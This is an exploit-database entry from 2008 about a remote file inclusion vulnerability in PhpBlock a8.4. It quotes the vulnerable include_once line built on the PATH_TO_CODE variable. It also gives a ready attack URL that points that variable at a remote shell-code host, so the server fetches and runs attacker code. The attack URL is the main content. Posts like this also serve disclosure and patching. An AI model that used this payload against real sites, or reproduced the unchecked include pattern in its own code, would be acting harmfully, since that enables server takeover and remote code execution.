PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability
# Published : 2008-04-02
# Author : w0cker
# Previous Title : DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability
# Next Title : EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit

Script Name : PHP Block a8.4
 
Download : http://sourceforge.net/project/downloading.php?group_id=186381&use_mirror=surfnet&filename=a8.4.zip&73507325
 
Error : include_once $PATH_TO_CODE."/script/fonction.php";
 
Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://[ShellCode]
 
Greetz : Kezzap66345 - Str0ke - Dread 35

# www.Syue.com [2008-04-02]